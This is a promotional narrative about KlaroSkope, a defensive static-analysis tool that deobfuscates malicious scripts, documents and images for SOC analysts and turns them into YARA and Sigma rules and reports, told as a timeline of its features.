Built for Defenders.
The story behind KlaroSkope,
and why static analysis is now fast again.
For years, static analysis meant the same thing: open any number of tools, copy-paste between them, decode layer by layer, chase your own tail through obfuscation stacks, trying to remember what binary or inflate looks like.
The tools to solve this were there, they still are, and static analysis has been around for decades. The problem was never the absence of tools, it was that none of them could keep up with the fast paced rhythm of an incident taking place right then and there.
Multilayered obfuscation added insult to injury: now each layer meant another tool, another manual step, another round of copy-pasting between environments. In the hands of the most experienced analysts, it was still slow. In the hands of anyone else, it was a lottery.
Static analysis quietly lost its place in SOC workflows. The window for actionable intelligence is measured in minutes.In seconds. Not hours.
What if it could be measured...
Over time, static analysis quietly lost its place in SOC workflows. During live incidents, the window for actionable intelligence is measured in minutes. Static analysis couldn't meet that bar, so it got pushed to forensics, to post-mortems, to the reports written days after the damage was done. By then, the intelligence was history, and the report turned into an addendum to the Lessons Learned.
I built KlaroSkope because that didn't have to be true, and I wished for something that would give back all the time this has taken analysts. Multilayered obfuscation can be a solved problem if recursion can be automated. The half-day workflow could become seconds and static analysis is fast again. Lightning fast in fact. Fast enough for mid-incident response. Fast enough, sometimes, to get ahead of the threat entirely, with the added bonus of no detonation, no sandbox, no risk of executing something you don't yet understand. You analyse the weapon before it detonates, and while it doesn't "know" it's being analysed.
I started this project because while working in the SOC I kept thinking: what if such a tool existed. Something that could be fed artefacts, obfuscated scripts, and within seconds could automagically resolve everything straight into YARA and Sigma rules. Then I could attach the report and fire it in an email within minutes of having a verdict. Wouldn't that be neat?
And so the story begins.
The Beginning
The first version did what no single tool had done before in one workflow: drop an obfuscated script, receive a YARA rule, a Sigma rule, a MITRE ATT&CK mapping, and a full report. Automatically. In seconds. Built from a SOC analyst’s frustration, not a product roadmap.
Compression, XOR, and the First Quality Gate
Support for compressed payloads and multi-byte XOR chains. The engine learns to stop when it has found the answer, not just when it has exhausted all options. A quality regression system prevents over-decoding and producing garbage output.
APT-Grade Deobfuscation
The engine expands from common script encodings to APT-grade compression formats used by real threat actors. A dedicated test suite based on documented campaign techniques begins. The shift from “script decoder” to “threat analysis engine.”
Intelligence Built In
An OSINT-derived key database brings known malware encryption keys into the pipeline automatically. Cipher identification runs without any analyst input. When the engine encounters an encrypted payload, it checks against documented keys tied to specific threat actors, decrypts if a match is found, and continues the analysis chain. No lookup. No manual effort.
Six Languages, One Engine
What started as a PowerShell decoder now handles six scripting languages in a single recursive pipeline: PowerShell, JavaScript, VBScript, PHP, Python, and Batch. Each language has its own obfuscation idioms, its own encoding tricks, its own evasion patterns. The engine resolves all of them the same way: layer by layer, automatically, with no analyst input required.
Every Obfuscation Has a Decoder
Invisible Unicode obfuscation. Zero-width character encoding used by documented campaigns in the wild. Esoteric JavaScript formats including JSFuck, JJEncode, and AAEncode. Bash ANSI-C quoting. VBScript Chr() chains. Python exec chains. Batch caret escapes. By this point the engine covers 100% of documented real-world obfuscation chains across all six supported languages.
Hidden Payloads in Images
Steganography extraction engine. Twelve techniques covering the majority of documented in-the-wild image steganography. Isolated container for untrusted image parsing. A PNG dropped into the platform now yields IOCs, YARA rules, and a report if a payload is hiding inside it.
Browser Extensions: An Overlooked Attack Surface
CRX and XPI files analysed as first-class artefacts. Manifest permissions classified by risk level. Obfuscated JavaScript extracted and run through the full deobfuscation pipeline. Steganographic payloads inside extension images detected. An attack vector that most organisations cannot inspect at all, handled automatically.
Encrypted Stego Payloads Decrypted
After extracting a hidden payload, the engine now attempts to decrypt it. Key material is pulled from EXIF metadata, PNG private chunks, and an OSINT database of known malware encryption keys with threat actor attribution. The chain extends: image to payload to decrypted content to deobfuscated script to IOCs.
Analyst View: Context Preserved
The most analytically significant feature in the platform. Traditional deobfuscation tools show you the final extracted value. Analyst View shows you the last moment the entire script was still readable, before extraction stripped context away. Every obfuscation resolution is marked inline. Every IOC shows which decode layer revealed it. The analyst sees the weapon in its original shape, not just its payload.
VBA Macro Obfuscation, Solved
A dedicated VBA function resolver handles macro obfuscation techniques used by Emotet, QakBot, Dridex, and AgentTesla across hundreds of known variants. The same recursion principle: each layer resolved in-place, context preserved, result clean.
PDF Documents: Every Trick Exposed
Full PDF document analysis. Embedded JavaScript extraction, URL harvesting, form action detection, and phishing kit identification. Recursive object parsing handles the nested structures that attackers use to hide payloads. A PDF dropped into the platform now yields every IOC, every embedded script, and every suspicious action without opening it.
Office Documents: Every Format Handled
Full analysis of Microsoft Office documents across all container formats. VBA macro extraction with VBA stomping detection. Template injection. DDE command extraction. XLM macro analysis. Embedded file handling. RTF objects. OneNote embedded scripts. The engine now reads what analysts call “malicious documents.”
Email Analysis
EML and MSG files analysed recursively. Attachments dispatched to the correct engine automatically. Authentication headers parsed. The full phishing delivery chain from email to attachment to script to payload resolved in a single drop.
Archive Analysis and the Matryoshka
Archive files of all major formats. Password-protected archives attempted against known malware passwords automatically. Extraction, analysis, and result merging across nested content. A single ZIP drop can now contain a .eml, containing an Office document, containing an embedded image, containing a stego payload, containing an encrypted script. Every layer analysed. Every IOC extracted. Every rule generated. In under a minute.
Surgical Precision
Resolution highlighting that shows, inline, exactly what each obfuscation layer decoded to. Report deduplication that collapses repeated analysis across nested content. The output is clean, precise, and ready to attach to an email within minutes of the artefact landing in the queue.
The story continues.
None of this happened in isolation. From the very first version, KlaroSkope has been shaped by security professionals who tested it, challenged it, and pushed it forward with real-world feedback. Every milestone on this timeline carries their fingerprints.